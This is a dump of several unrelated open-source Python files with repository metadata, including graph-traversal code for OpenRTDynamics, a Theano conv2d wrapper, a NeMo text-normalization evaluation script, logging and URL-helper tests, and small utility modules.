openrtdynamics2/lang/diagram_core/graph_traversion.py
|
OpenRTDynamics/PythonAPI_Experiments
|
1b7a114110089bc7721da604c5e344854ed555c3
|
[
"MIT"
] | null | null | null |
from .signal_network.signals import *
from .signal_network.Block import *
# from .system import *
from typing import Dict, List
from colorama import init, Fore, Back, Style
init(autoreset=True)
#
# NOTE: this is not used
#
class graph_traversion2:
def __init__(self):
# the list of reachable blocks
self.reachableBlocks = []
# Start forward traversion starting from the given startBlock
def forwardTraverse(self, startBlock : Block):
self.reachableBlocks = []
# fill in self.reachableBlocks
self.forwardTraverse__(startBlock, depthCounter = 0)
# reset graph traversion markers
for block in self.reachableBlocks:
block.graphTraversionMarkerReset()
return self.reachableBlocks
# Start forward traversion starting from the given startBlock
def forwardTraverse__(self, startBlock : Block, depthCounter : int):
tabs = ''
for i in range(0, depthCounter):
tabs += ' '
# print(tabs + "....... depth " + str( depthCounter ) )
#
if startBlock.graphTraversionMarkerMarkIsVisited():
print(tabs + "*** visited *** " + startBlock.name + " (" + str( startBlock.id ) + ") ****") ## TODO investigtare: why is this never reached?
return
# store this block as it is reachable
self.reachableBlocks.append( startBlock )
# make the node as visited
startBlock.graphTraversionMarkerMarkVisited()
print(tabs + "-- " + startBlock.name + " (" + str( startBlock.id ) + ") --" )
# find out the links to other blocks
for signal in startBlock.getOutputSignals():
# for each output signal
print(tabs + "-> S " + signal.name )
if len( signal.getDestinationBlocks() ) == 0:
print(tabs + '-- none --')
for destinationBlock in signal.getDestinationBlocks():
# destinationBlock is a link to a connected block
print( tabs + "*", destinationBlock.name, "(", destinationBlock.id, ")" )
# recursion
self.forwardTraverse__( destinationBlock, depthCounter = depthCounter + 1 )
# Start backward traversion starting from the given startBlock
#
# Note this is not fully tested
# DELETE SOON, if it is not needed
#
def backwardTraverseExec(self, startBlock : Block):
self.reachableBlocks = []
# fill in self.reachableBlocks
self.backwardTraverseExec__(startBlock, depthCounter = 0)
# reset graph traversion markers
for block in self.reachableBlocks:
block.graphTraversionMarkerReset()
return self.reachableBlocks
# Start backward traversion starting from the given startBlock
def backwardTraverseExec__(self, startBlock : Block, depthCounter : int):
tabs = ''
for i in range(0, depthCounter):
tabs += ' '
#print(tabs + "....... depth " + str( depthCounter ) )
#
if startBlock.graphTraversionMarkerMarkIsVisited():
print(tabs + "*** visited *** " + startBlock.name + " (" + str( startBlock.id ) + ") ****") ## TODO investigtare: why is this never reached?
return
# check of the block 'startBlock'
#if config_request_define_feedforward_input_dependencies( signal )
# store this block as it is reachable
self.reachableBlocks.append( startBlock )
# make the node as visited
startBlock.graphTraversionMarkerMarkVisited()
print(tabs + "--- " + startBlock.name + " (" + str( startBlock.id ) + ") --" )
# find out the links to other blocks
for signal in startBlock.getInputSignals():
# for each output signal
print(tabs + "-> S " + signal.name )
if signal.getSourceBlock() is None:
print(tabs + '-- ERROR: no input signal defined for this block! --')
else:
print( tabs + "*", signal.getSourceBlock().name, "(", signal.getSourceBlock().id, ")" )
self.forwardTraverse__( signal.getSourceBlock(), depthCounter = depthCounter + 1 )
class ExecutionLine():
"""
This is a data structure
It contains a list 'signalOrder' of signals to be computed in the given order.
The computation of these signals depends on a list of signals given by
'dependencySignals'.
"""
def __init__(
self,
signalOrder : List[ Signal ],
dependencySignals : List[ Signal ],
dependencySignalsSimulationInputs : List[ Signal ],
blocksToUpdateStates : List[ Block ],
dependencySignalsThroughStates : List[ Signal ]
):
self.signalOrder = signalOrder
self.dependencySignals = dependencySignals # TODO: check if this is still needed.
self.dependencySignalsSimulationInputs = dependencySignalsSimulationInputs
self.blocksToUpdateStates = blocksToUpdateStates
self.dependencySignalsThroughStates = dependencySignalsThroughStates
def printExecutionLine(self):
print("------ print of execution line -----")
print(Fore.RED + "dependent sources of any kind:")
for s in self.dependencySignals:
print(" - " + s.name )
print(Fore.RED + "dependent sources (simulation inputs):")
for s in self.dependencySignalsSimulationInputs:
print(" - " + s.name )
print(Fore.RED + "dependent sources (through state-dependend blocks):")
for s in self.dependencySignalsThroughStates:
print(" - " + s.name )
print(Fore.GREEN + "execution order:")
for s in self.signalOrder:
print(" - " + s.name )
print(Fore.GREEN + "blocks whose states must be updated:")
for block in self.blocksToUpdateStates:
print(" - " + block.name )
def getSignalsToExecute(self):
l = []
l.extend( self.signalOrder )
return l
def appendExecutionLine(self, executionLineToAppend):
# merge dependencySignals: only add the elements of executionLineToAppend.dependencySignals
# to self.dependencySignals that are not part of self.dependencySignals or self.signalOrder
# TODO: to optimize: use sets to merge
# for s in executionLineToAppend.dependencySignals:
# if not s in self.dependencySignals and not s in self.signalOrder:
# self.dependencySignals.append(s)
for s in executionLineToAppend.dependencySignalsSimulationInputs:
if not s in self.dependencySignalsSimulationInputs and not s in self.signalOrder:
self.dependencySignalsSimulationInputs.append(s)
for s in executionLineToAppend.dependencySignalsThroughStates:
if not s in self.dependencySignalsThroughStates and not s in self.signalOrder:
self.dependencySignalsThroughStates.append(s)
original_list_tmp = self.signalOrder.copy()
for s in executionLineToAppend.signalOrder:
# TODO: (for optimization purposes)
# check if there common blocks in the list. (only in case a block has more than one
# output signals and one of these signals is in the list executionLineToAppend.signalOrder
# and another one in self.signalOrder )
# just append the
if not s in original_list_tmp:
self.signalOrder.append( s )
else:
print("appendExecutionLine: skipped to add " + s.name)
original_list_tmp = self.blocksToUpdateStates.copy()
for b in executionLineToAppend.blocksToUpdateStates:
# TODO: (for optimization purposes)
# check if there comcon blocks in the list.
# just append the
if not b in original_list_tmp:
self.blocksToUpdateStates.append( b )
class BuildExecutionPath:
"""
Find out the order in which signals have to be computed such that a given signal
'signal_to_calculate' can be calculated. This means finding out all dependencies of
'signal_to_calculate'. For each call to 'determine_execution_order' only the signals that
were not already marked as a dependency in previous calls are returned.
Each call to 'determine_execution_order' gives an instance 'ExecutionLine'
"""
def __init__(self, show_print:int=0):
self._show_print = show_print
# list of marked signals (important to reset their visited flags)
self.marked_signals = []
# number of calls to determine_execution_order()
self.level = 0
def __del__(self):
# reset the grap markers stored in the signals
self.reset_markers()
def determine_execution_order(self, signal_to_calculate : Signal, current_system):
"""
get the order of computation steps and their order that have
to be performed to compute 'signal_to_calculate'
For each call to this function, a list is generated that does not contain
signals that are already part of a previous list (that are already computed)
This function can be called multiple times and returns only the necessary
computations. Computations already planned in previous calls of this function
are not listed again. (until reset_markers() is called)
-- results --
execution_order contains the list of signals to comute in the correct order including
the target signals. Not included in this list are signals that cross the border to the simulation
specified by signal_to_calculate.system (coming from an outer system). Further, not included are
signals that have been computet in a previous call to determine_execution_order().
dependency_signals contains all signals that are required to comput signalToCalculate
and either cross the border of a simulation,
"""
# TODO: dependency signals should stay as they are but reachableSignals should not contain signals
# that already have been calculated. Further, reachableSignals shall also contain dependency if they
# were not already calculated
if self._show_print > 0:
print("determine_execution_order on level " + str(self.level) )
# compute by traversing the tree
execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states = self.backwards_traverse_signals_exec__(start_signal=signal_to_calculate, depth_counter = 0, current_system=current_system)
# the iteration level
self.level = self.level + 1
return ExecutionLine( execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states )
def printExecutionLine(self):
pass
def reset_markers(self):
# reset graph traversion markers
for signal in self.marked_signals:
signal.graphTraversionMarkerReset()
# reset status variables
self.marked_signals = []
self.level = 0
def place_marker_for_current_level(self, signal):
# mark the node/signal as being visited (meaning computed)
signal.graphTraversionMarkerMarkVisited(self.level)
self.marked_signals.append(signal)
# NOTE: unused
def is_signal_already_computable(self, signal : Signal):
return signal.graphTraversionMarkerMarkIsVisited()
# Start backward traversion starting from the given startSignal
def backwards_traverse_signals_exec__(self, start_signal : Signal, depth_counter : int, current_system):
# WARNING: This is a recursive function!
# the list of signals to compute in correct order
execution_order = []
# list of signals the computation depends on (the tips of the execution tree)
dependency_signals = []
# the list of simulation input signals required for the computation
dependency_signals_simulation_inputs = []
# For each signgal execution_order there might be a blocks that
# has an internal memory. It is required to build a list of those blocks
# that need a state update after their output(s) are calculated.
blocks_to_update_states = []
#
dependency_signals_through_states = []
#
# check if the datatype of startSignal is defined
#
if start_signal.datatype is None:
raise BaseException('Unknown datatype for signal ' + start_signal.name + ': no datatype has been specified or could be determined automatically.')
#
#
#
tabs = ''
for i in range(0, depth_counter):
tabs += '. '
if not (isinstance(start_signal, SimulationInputSignal) or isinstance(start_signal, BlockOutputSignal)):
# this case must be an error..
raise BaseException('not implemented or internal error: unexpected type of signal ' + start_signal.name)
# check if the signal is a system input signal
is_crossing_simulation_border = start_signal.is_crossing_system_boundary(current_system) # self.system != startSignal.sim
# TODO: IMPLEMENT: except when startSignal is a simulation input (in this case it is not computed)
# and not isinstance(startSignal, SimulationInputSignal)
if start_signal.graphTraversionMarkerMarkIsVisitedOnLevelLowerThan(self.level):
# - a previously computed signal has been reached
if self._show_print > 1:
print(Style.DIM + tabs + "has already been calculated in a previous traversion")
dependency_signals.append( start_signal )
# in case startSignal is a simulation input, still add it to the list of simulation input dependencies
# though it has already been computed
if is_crossing_simulation_border:
if self._show_print > 1:
print(Style.DIM + tabs + "as it is also a simulation input, adding it to the list of depended inputs")
# also note down that this is a (actually used) simulation input
dependency_signals_simulation_inputs.append( start_signal )
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
if start_signal.graphTraversionMarkerMarkIsVisited():
if self._show_print > 1:
print(Style.DIM + tabs + "has already been calculated in this traversion")
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
if is_crossing_simulation_border:
# signal is an input to the system
# add to the list of dependent inputs
if self._show_print > 1:
print(Fore.YELLOW + tabs + " --> crosses system bounds")
# startSignal is at the top of the tree, so add it to the dependencies
dependency_signals.append( start_signal )
# also note down that this is a (actually used) simulation input
dependency_signals_simulation_inputs.append( start_signal )
if self._show_print > 1:
print(Style.DIM + tabs + "added input dependency " + start_signal.toStr())
# mark the node/signal as being visited (meaning computed)
self.place_marker_for_current_level(start_signal)
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
# get the blocks prototype function to calculate startSignal
block = start_signal.getSourceBlock()
blocksPrototype = block.getBlockPrototype()
#
# check if the block that yields startSignal uses internal-states to compute startSignal
#
inputs_to_update_states_tmp = blocksPrototype.config_request_define_state_update_input_dependencies( start_signal )
if inputs_to_update_states_tmp is not None:
if self._show_print > 1:
print(tabs + "--- signals needed *indirectly* to compute " + start_signal.name + " (through state update) --" )
#
blocks_to_update_states.append( block )
# please note: blocksPrototype.config_request_define_state_update_input_dependencies might return some undetermined signals that are resolved here
resolveUndeterminedSignals( inputs_to_update_states_tmp )
# add the signals that are required to perform the state update
dependency_signals_through_states.extend( inputs_to_update_states_tmp )
if self._show_print > 1:
for signal in inputs_to_update_states_tmp:
print(Fore.MAGENTA + tabs + "-> S " + signal.name )
#
# find out the links to other signals but only these ones that are
# needed to calculate 'startSignal'
#
if self._show_print > 1:
print(tabs + "--- signals needed for " + start_signal.name + " --" )
dependingSignals = blocksPrototype.config_request_define_feedforward_input_dependencies(start_signal)
# please note: blocksPrototype.config_request_define_feedforward_input_dependencies might return some undetermined signals that are resolved here
resolveUndeterminedSignals( dependingSignals )
if len(dependingSignals) == 0:
# no dependencies to calculate startSignal (e.g. in case of const blocks or blocks without direct feedthrough)
if self._show_print > 1:
print(Style.DIM + tabs + " (no signals needed) " )
# block startSignal.getSourceBlock() --> startSignal is a starting point
# startSignal is at the top of the tree, so add it to the dependencies
dependency_signals.append( start_signal )
#
if self._show_print > 1:
print(Style.DIM + tabs + "added " + start_signal.toStr())
execution_order.append( start_signal )
# mark the node/signal as being visited (meaning computed)
self.place_marker_for_current_level(start_signal)
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
#
# ITERATE: go through all signals needed to calculate startSignal
# only in case there are any, we come to this point
#
for signal in dependingSignals:
if self._show_print > 1:
print(Fore.MAGENTA + tabs + "-> S " + signal.name )
if depth_counter > 100:
raise BaseException('maximal number of iterations reached in system ' + signal.system.name + 'signal ' + signal.name)
# R E C U R S I O N
A_execution_order, A_dependency_signals, A_dependency_signals_simulation_inputs, A_blocks_to_update_states, A_dependency_signals_through_states = self.backwards_traverse_signals_exec__( signal, depth_counter = depth_counter + 1, current_system=current_system )
execution_order.extend( A_execution_order )
dependency_signals.extend( A_dependency_signals )
dependency_signals_simulation_inputs.extend( A_dependency_signals_simulation_inputs )
blocks_to_update_states.extend( A_blocks_to_update_states )
dependency_signals_through_states.extend( A_dependency_signals_through_states )
#
# FINALIZE: now also startSignal can be computed
#
#
# store startSignal as reachable (put it on the execution list)
# NOTE: if startSignal is the tip of the tree (no dependingSignals) it is excluded
# from this list. However, it is still in the list of dependencySignals.
#
if self._show_print > 1:
print(Style.DIM + tabs + "added " + start_signal.toStr())
execution_order.append( start_signal )
# mark the node/signal as being visited (meaning computed)
self.place_marker_for_current_level(start_signal)
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
| 37.78777
| 272
| 0.652975
|
078805334a4dc09621d35922fbab569351058e34
| 6,266
|
py
|
Python
|
theano/tensor/nnet/__init__.py
|
bartvm/Theano
|
e088e2a8d81a27c98b2e80b1a05227700996e42d
|
[
"BSD-3-Clause"
] | null | null | null |
theano/tensor/nnet/__init__.py
|
bartvm/Theano
|
e088e2a8d81a27c98b2e80b1a05227700996e42d
|
[
"BSD-3-Clause"
] | null | null | null |
theano/tensor/nnet/__init__.py
|
bartvm/Theano
|
e088e2a8d81a27c98b2e80b1a05227700996e42d
|
[
"BSD-3-Clause"
] | null | null | null |
from .nnet import (
CrossentropyCategorical1Hot, CrossentropyCategorical1HotGrad,
CrossentropySoftmax1HotWithBiasDx, CrossentropySoftmaxArgmax1HotWithBias,
LogSoftmax, Prepend_scalar_constant_to_each_row,
Prepend_scalar_to_each_row, Softmax,
SoftmaxGrad, SoftmaxWithBias, binary_crossentropy,
categorical_crossentropy, crossentropy_categorical_1hot,
crossentropy_categorical_1hot_grad, crossentropy_softmax_1hot,
crossentropy_softmax_1hot_with_bias,
crossentropy_softmax_1hot_with_bias_dx,
crossentropy_softmax_argmax_1hot_with_bias,
crossentropy_softmax_max_and_argmax_1hot,
crossentropy_softmax_max_and_argmax_1hot_with_bias,
crossentropy_to_crossentropy_with_softmax,
crossentropy_to_crossentropy_with_softmax_with_bias,
graph_merge_softmax_with_crossentropy_softmax, h_softmax,
logsoftmax, logsoftmax_op, prepend_0_to_each_row, prepend_1_to_each_row,
prepend_scalar_to_each_row, relu, softmax, softmax_grad, softmax_graph,
softmax_op, softmax_simplifier, softmax_with_bias, elu)
from . import opt
from .conv import ConvOp
from .Conv3D import *
from .ConvGrad3D import *
from .ConvTransp3D import *
from .sigm import (softplus, sigmoid, sigmoid_inplace,
scalar_sigmoid, ultra_fast_sigmoid,
hard_sigmoid)
from .bn import batch_normalization
import warnings
from .abstract_conv import conv2d as abstract_conv2d
def conv2d(input, filters, input_shape=None, filter_shape=None,
border_mode='valid', subsample=(1, 1), filter_flip=True,
image_shape=None, **kwargs):
"""
This function will build the symbolic graph for convolving a mini-batch of a
stack of 2D inputs with a set of 2D filters. The implementation is modelled
after Convolutional Neural Networks (CNN).
Parameters
----------
input: symbolic 4D tensor
Mini-batch of feature map stacks, of shape
(batch size, input channels, input rows, input columns).
See the optional parameter ``input_shape``.
filters: symbolic 4D tensor
Set of filters used in CNN layer of shape
(output channels, input channels, filter rows, filter columns).
See the optional parameter ``filter_shape``.
input_shape: None, tuple/list of len 4 of int or Constant variable
The shape of the input parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
filter_shape: None, tuple/list of len 4 of int or Constant variable
The shape of the filters parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
border_mode: str, int or tuple of two int
Either of the following:
``'valid'``: apply filter wherever it completely overlaps with the
input. Generates output of shape: input shape - filter shape + 1
``'full'``: apply filter wherever it partly overlaps with the input.
Generates output of shape: input shape + filter shape - 1
``'half'``: pad input with a symmetric border of ``filter rows // 2``
rows and ``filter columns // 2`` columns, then perform a valid
convolution. For filters with an odd number of rows and columns, this
leads to the output shape being equal to the input shape.
``int``: pad input with a symmetric border of zeros of the given
width, then perform a valid convolution.
``(int1, int2)``: pad input with a symmetric border of ``int1`` rows
and ``int2`` columns, then perform a valid convolution.
subsample: tuple of len 2
Factor by which to subsample the output.
Also called strides elsewhere.
filter_flip: bool
If ``True``, will flip the filter rows and columns
before sliding them over the input. This operation is normally referred
to as a convolution, and this is the default. If ``False``, the filters
are not flipped and the operation is referred to as a cross-correlation.
image_shape: None, tuple/list of len 4 of int or Constant variable
Deprecated alias for input_shape.
kwargs: Any other keyword arguments are accepted for backwards
compatibility, but will be ignored.
Returns
-------
Symbolic 4D tensor
Set of feature maps generated by convolutional layer. Tensor is
of shape (batch size, output channels, output rows, output columns)
Notes
-----
If CuDNN is available, it will be used on the
GPU. Otherwise, it is the *CorrMM* convolution that will be used
"caffe style convolution".
This is only supported in Theano 0.8 or the development
version until it is released.
"""
if 'imshp_logical' in kwargs or 'kshp_logical' in kwargs:
raise ValueError(
"Keyword arguments 'imshp_logical' and 'kshp_logical' for conv2d "
"are not supported anymore (and have not been a reliable way to "
"perform upsampling). That feature is still available by calling "
"theano.tensor.nnet.conv.conv2d() for the time being.")
if len(kwargs.keys()) > 0:
warnings.warn(str(kwargs.keys()) +
" are now deprecated in "
"`tensor.nnet.abstract_conv.conv2d` interface"
" and will be ignored.",
stacklevel=2)
if image_shape is not None:
warnings.warn("The `image_shape` keyword argument to "
"`tensor.nnet.conv2d` is deprecated, it has been "
"renamed to `input_shape`.",
stacklevel=2)
if input_shape is None:
input_shape = image_shape
else:
raise ValueError("input_shape and image_shape should not"
" be provided at the same time.")
return abstract_conv2d(input, filters, input_shape, filter_shape,
border_mode, subsample, filter_flip)
| 43.513889
| 81
| 0.680179
|
2ff691a15bfcbcf3f669388ce76d0adbe069de40
| 431
|
py
|
Python
|
data/scripts/templates/object/mobile/shared_forest_murra.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/mobile/shared_forest_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/mobile/shared_forest_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_forest_murra.iff"
result.attribute_template_id = 9
result.stfName("monster_name","murra")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 25.352941
| 58
| 0.721578
|
7934df9d7242729576f9def8fe0b5b369d84387d
| 173
|
py
|
Python
|
vnpy_pro/app/data_recorder/__init__.py
|
caizhanjin/vnpy
|
c0886dbd8eba7f506634b1700dfd09b0b098ef26
|
[
"MIT"
] | 5
|
2020-09-13T05:07:38.000Z
|
2020-12-26T15:10:00.000Z
|
vnpy_pro/app/data_recorder/__init__.py
|
caizhanjin/vnpy
|
c0886dbd8eba7f506634b1700dfd09b0b098ef26
|
[
"MIT"
] | null | null | null |
vnpy_pro/app/data_recorder/__init__.py
|
caizhanjin/vnpy
|
c0886dbd8eba7f506634b1700dfd09b0b098ef26
|
[
"MIT"
] | 2
|
2020-06-03T06:40:31.000Z
|
2020-06-12T14:55:17.000Z
|
from vnpy.app.data_recorder import DataRecorderApp
from .engine import RecorderEnginePro
class DataRecorderAppPro(DataRecorderApp):
engine_class = RecorderEnginePro
| 19.222222
| 50
| 0.83815
|
1ed55ecac948fb03cae35935bf29747fabc14617
| 5,987
|
py
|
Python
|
examples/nlp/text_normalization_as_tagging/evaluation/eval_per_class.py
|
gkucsko/NeMo
|
c1ae0a7744d9a0ac206f61b2883ce00c9b8339b9
|
[
"Apache-2.0"
] | null | null | null |
examples/nlp/text_normalization_as_tagging/evaluation/eval_per_class.py
|
gkucsko/NeMo
|
c1ae0a7744d9a0ac206f61b2883ce00c9b8339b9
|
[
"Apache-2.0"
] | 1
|
2022-03-06T14:09:02.000Z
|
2022-03-06T14:09:02.000Z
|
examples/nlp/text_normalization_as_tagging/evaluation/eval_per_class.py
|
gkucsko/NeMo
|
c1ae0a7744d9a0ac206f61b2883ce00c9b8339b9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2022, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script can be used to compare the inference output of Thutmose tagger with multi_reference file.
The additional report is stored to a separate file for each semiotic class.
USAGE Example:
python eval_per_class.py \
--inference_file= \
--reference_file= \
--output_file=
The inference file is a tsv file in which the first column contains the predicted sentence text.
The reference file is a tsv file in which
the first column contains the input sentence text,
the second column contains the reference sentence text (taken from Google TN dataset)
the third column (optional) contains additional acceptable references for semiotic spans in this sentence.
E.g.
mizoguchi akiko september twenty ten mizoguchi akiko september 2010 DATE 2 5 | sept 2010 | sep. 2010 ...
The script generates:
a file with report on accuracy per semiotiotic class (output_file).
files (<output_file>.<semiotic_class>) with sentences, containing errors in this semiotic span.
"""
import glob
import os
from argparse import ArgumentParser
from collections import Counter
parser = ArgumentParser(description="Compare inference output with multi-reference, print report per class")
parser.add_argument("--inference_file", type=str, required=True, help="Path to inference file 1")
parser.add_argument("--reference_file", type=str, required=True, help="Path to reference file")
parser.add_argument("--output_file", type=str, required=True, help="Path to output file")
args = parser.parse_args()
# Main code
if __name__ == '__main__':
# delete all class-specific reports, as they are created in the append mode
for f in glob.glob(args.output_file + ".*"):
os.remove(f)
total_count = Counter()
correct_count = Counter()
f_ref = open(args.reference_file, "r", encoding="utf-8")
f_infer = open(args.inference_file, "r", encoding="utf-8")
f_out = open(args.output_file, "w", encoding="utf-8")
lines_ref = f_ref.readlines()
lines_infer = f_infer.readlines()
f_ref.close()
f_infer.close()
if len(lines_ref) != len(lines_infer):
raise ValueError(
"Number of lines doesn't match: len(lines_ref)="
+ str(len(lines_ref))
+ "; len(lines_infer)="
+ str(len(lines_infer))
)
for i in range(len(lines_infer)):
_, inp_str, _, tag_with_swap_str, semiotic = lines_infer[i].strip().split("\t")
input_words = inp_str.split(" ")
predicted_tags = tag_with_swap_str.split(" ")
predicted_words = predicted_tags[:]
for k in range(len(predicted_tags)):
t = predicted_tags[k]
if t == "<SELF>":
predicted_words[k] = input_words[k]
elif t == "<DELETE>":
predicted_words[k] = ""
else:
predicted_words[k] = predicted_words[k].replace(">", "").replace("<", "")
parts = lines_ref[i].strip().split("\t")
if len(parts) < 2 or len(parts) > 3:
raise ValueError("Bad format: " + lines_ref[i])
if len(parts) == 3: # there are non-trivial semiotic spans
spans = parts[2].split(";")
for span in spans:
span_parts = span.split(" | ")
try:
sem, begin, end = span_parts[0].split(" ")
except Exception:
print("error: ", lines_ref[i])
continue
begin = int(begin)
end = int(end)
ok = False
predicted_span = " ".join(predicted_words[begin:end]).replace("_", " ").replace(" ", "").casefold()
input_span = " ".join(input_words[begin:end])
total_count[sem] += 1
for tr_variant in span_parts[1:]:
ref_span = tr_variant.replace("_", " ").replace(" ", "").casefold()
if ref_span == predicted_span:
ok = True
correct_count[sem] += 1
break
if not ok:
out_sem = open(args.output_file + "." + sem, "a", encoding="utf-8")
out_sem.write(
"error: pred="
+ " ".join(predicted_words[begin:end])
+ "; inp="
+ input_span
+ "; ref="
+ span
+ "\n"
)
out_sem.write("\tinput=" + " ".join(input_words) + "\n")
out_sem.write("\ttags=" + " ".join(predicted_tags) + "\n")
out_sem.write("\tpred=" + " ".join(predicted_words) + "\n")
out_sem.write("\tsemiotic=" + semiotic + "\n")
out_sem.write("\tref=" + parts[1] + "\n")
out_sem.close()
f_out.write("class\ttotal\tcorrect\terrors\taccuracy\n")
for sem in total_count:
f_out.write(
sem
+ "\t"
+ str(total_count[sem])
+ "\t"
+ str(correct_count[sem])
+ "\t"
+ str(total_count[sem] - correct_count[sem])
+ "\t"
+ str(correct_count[sem] / total_count[sem])
+ "\n"
)
f_out.close()
| 41.006849
| 119
| 0.574745
|
662169b81621bb0829d61cce2994cf0ec19718e9
| 368
|
py
|
Python
|
Programming-Basics-with-Python-April-2019/07_conditional_statements_more_exercises/05_firm.py
|
marinakolova/Python-Courses
|
eb95c782307be561b5026c5adafaa001b04caf4f
|
[
"MIT"
] | null | null | null |
Programming-Basics-with-Python-April-2019/07_conditional_statements_more_exercises/05_firm.py
|
marinakolova/Python-Courses
|
eb95c782307be561b5026c5adafaa001b04caf4f
|
[
"MIT"
] | null | null | null |
Programming-Basics-with-Python-April-2019/07_conditional_statements_more_exercises/05_firm.py
|
marinakolova/Python-Courses
|
eb95c782307be561b5026c5adafaa001b04caf4f
|
[
"MIT"
] | null | null | null |
import math
hours_needed = int(input())
days = int(input())
overtime_workers = int(input())
hours_worked = days * 0.9 * 8
hours_worked += (overtime_workers * 2 * days)
if hours_worked >= hours_needed:
print(f"Yes!{math.floor(hours_worked) - hours_needed} hours left.")
else:
print(f"Not enough time!{hours_needed - math.floor(hours_worked)} hours needed.")
| 26.285714
| 85
| 0.711957
|
34c0603e0b5a89d64a71152434b12453ed7c0aee
| 323
|
py
|
Python
|
use/python/log_handle/examples/src_cfg_log.py
|
MuggleWei/Hakuna_Matata
|
6a3a012dc2a5942599098d94e90e9381d660500d
|
[
"WTFPL"
] | null | null | null |
use/python/log_handle/examples/src_cfg_log.py
|
MuggleWei/Hakuna_Matata
|
6a3a012dc2a5942599098d94e90e9381d660500d
|
[
"WTFPL"
] | 30
|
2020-03-04T21:59:09.000Z
|
2022-01-04T16:46:52.000Z
|
use/python/log_handle/examples/src_cfg_log.py
|
MuggleWei/Hakuna_Matata
|
6a3a012dc2a5942599098d94e90e9381d660500d
|
[
"WTFPL"
] | null | null | null |
import logging
from log_handle import LogHandle
if __name__ == "__main__":
LogHandle.init_log(filename="logs/output.log", use_rotate=True)
logging.debug("debug message")
logging.info("info message")
logging.warning("warning message")
logging.error("error message")
logging.fatal("fatal message")
| 24.846154
| 67
| 0.724458
|
b2088699d1cb9127cee7d5b6814fa68eacbbee04
| 1,290
|
py
|
Python
|
tests/test_utils.py
|
qiskit-community/repo-monitor
|
b777f64b340e1bf46be017a80c5c6e521f466e5d
|
[
"Apache-2.0"
] | 9
|
2021-08-06T14:33:06.000Z
|
2022-01-01T04:00:39.000Z
|
tests/test_utils.py
|
qiskit-community/repo-monitor
|
b777f64b340e1bf46be017a80c5c6e521f466e5d
|
[
"Apache-2.0"
] | 2
|
2021-08-04T18:52:31.000Z
|
2021-10-01T20:57:25.000Z
|
tests/test_utils.py
|
qiskit-community/repo-monitor
|
b777f64b340e1bf46be017a80c5c6e521f466e5d
|
[
"Apache-2.0"
] | 4
|
2021-08-12T06:49:30.000Z
|
2022-02-08T20:19:34.000Z
|
"""Tests for utils."""
import unittest
from typing import Optional, Union
from monitor.utils import UrlsHelper, GitHubUrlsHelper
class MockUrlsHelper(UrlsHelper):
"""Mock urls helpder for testing purposes."""
def get_comments_url(self, account: str, repo: str,
number: Union[str, int]) -> str:
"""Returns mock comments url."""
return "http://localhost/comments"
def get_issues_url(self, account: str, repo: str,
page: Optional[Union[str, int]] = None) -> str:
"""Returns mock issues url."""
return "http://localhost/issues"
class TestUrlHelper(unittest.TestCase):
"""Tests url helpers."""
def test_github_url_heler(self):
"""Tests github url helpder,"""
helper = GitHubUrlsHelper()
issues_api_url = "https://api.github.com/repos/Qiskit/qiskit-terra/" \
"issues?page=10&state=open&per_page=100"
comments_api_url = "https://api.github.com/repos/Qiskit/qiskit-terra/" \
"issues/1234/comments?per_page=100"
self.assertEqual(helper.get_issues_url("Qiskit", "qiskit-terra", 10), issues_api_url)
self.assertEqual(helper.get_comments_url("Qiskit", "qiskit-terra", 1234), comments_api_url)
| 36.857143
| 99
| 0.634884
|
3ac5c76f5e2524e281652dabbac7e557c65b9b98
| 295
|
py
|
Python
|
poster/streaminghttp/__init__.py
|
EvanDarwin/poster
|
88e0149cce746d4fe8781da45ca6e0d772356237
|
[
"MIT"
] | null | null | null |
poster/streaminghttp/__init__.py
|
EvanDarwin/poster
|
88e0149cce746d4fe8781da45ca6e0d772356237
|
[
"MIT"
] | 2
|
2016-06-15T18:46:47.000Z
|
2016-06-16T00:40:18.000Z
|
poster/streaminghttp/__init__.py
|
EvanDarwin/poster
|
88e0149cce746d4fe8781da45ca6e0d772356237
|
[
"MIT"
] | 1
|
2021-06-22T10:03:32.000Z
|
2021-06-22T10:03:32.000Z
|
def register_openers():
"""
DEPRECATED - This function will be removed in version 1.0.0
This function is now a placeholder for backwards compatibility
"""
class DummyOpener(object):
def add_handler(self, *args, **kwargs):
pass
return DummyOpener()
| 22.692308
| 66
| 0.647458
|
8d9a52c4fa148539c5eaa922ae3577a237cbb763
